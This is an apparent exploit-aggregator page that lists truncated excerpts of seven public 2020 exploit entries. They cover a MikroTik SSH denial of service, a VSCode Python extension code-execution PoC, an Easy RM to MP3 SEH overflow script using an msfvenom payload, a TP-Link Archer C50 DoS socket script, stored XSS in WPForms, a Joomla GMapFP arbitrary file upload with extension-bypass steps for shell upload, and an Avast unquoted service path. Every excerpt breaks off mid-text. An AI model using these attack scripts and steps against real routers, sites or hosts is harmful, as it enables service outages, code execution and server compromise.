EXPLOIT SKY

# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) # Author: Hosein Askari # Date: 2020-03-18 # Vendor Homepage: https://mikrotik.com/ # Model: hAP lite # Processor architecture: smips # Affected Version: through 6.44.3 # CVE: N/A #Description: An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management. #details: The issue reported in 02/25/2020 to the Mikrotik First response by Mikrotik in 02/26/2020 The additional information about exploit and PoC vi...

# VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension. >TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository. You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html). ## HowTo - Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git` - Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app* - Open `test.py` in VScode Download ~ https://github.com/offensive-s...

# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH) # Date: 2020-03-26 # Author: Felipe Winsnes # Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe # Version: 2.7.3.700 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open the Application # 4.- If the 'Preferences' windows pops up, just click 'Cancel' # 4.- Click 'Batch' # 5.- Delete everything on the parameter 'Input:' and paste the clipboard there # 6.- Select OK # 7.- Some Windows message boxes will pop up, click OK. # 8.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/ import struct import sys # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alph...

# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC) # Date: 2020-01-25 # Exploit Author: thewhiteh4t # Vendor Homepage: https://www.tp-link.com/ # Version: TP-Link Archer C50 v3 Build 171227 # Tested on: Arch Linux x64 # CVE: CVE-2020-9375 # Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html import time import socket ip = '192.168.0.1' port = 80 print ( '[+] IP : ' + ip ) print ( '[+] Port : ' + str ( port ) ) for i in range ( 2 ) : time . sleep ( 1 ) try : print ( '[+] Initializing Socket...' ) s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) s . settimeout ( 5 ) print ( '[!] Connecting to target...' ) s . connect ( ( ip , port ) ) header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n' . format ( ip...

# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting # Date: 2020-02-18 # Vendor Homepage: https://wpforms.com # Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 1.5.8.2 and below # CVE : CVE-2020-10385 1. Description WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin’s Form Builder module was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. While they do not pose high security threat being an authenticated XSS vulnerability, an attacker can potentially exploit this to perform malicious actions on a WordPress multisite installation to have a super admin’s cookies sen...

# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-25 # Exploit Author: ThelastVvV # Vendor Homepage:https://gmapfp.org/ # Version:* Version J3.30pro # Tested on: Ubuntu # PoC: http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image # you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg # Dir File Path: http://127.0.0.1/images/gmapfp/file.php or http://127.0.0.1//images/gmapfp/file.php.png # The Joomla Gmapfp Components 3.x is allowing # remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads. Preference : https://www.exploit-db.com/exploits/48248

# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-03-24 # Vendor Homepage:https://www.avast.com/ # Software Link :https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx # Tested Version: 5.5.522.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 8.1 Single Language x32 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | f indstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """ Avast SecureLine SecureLine C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe Auto C:\>sc qc SecureLine [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SecureLine TIPO : 10 WIN...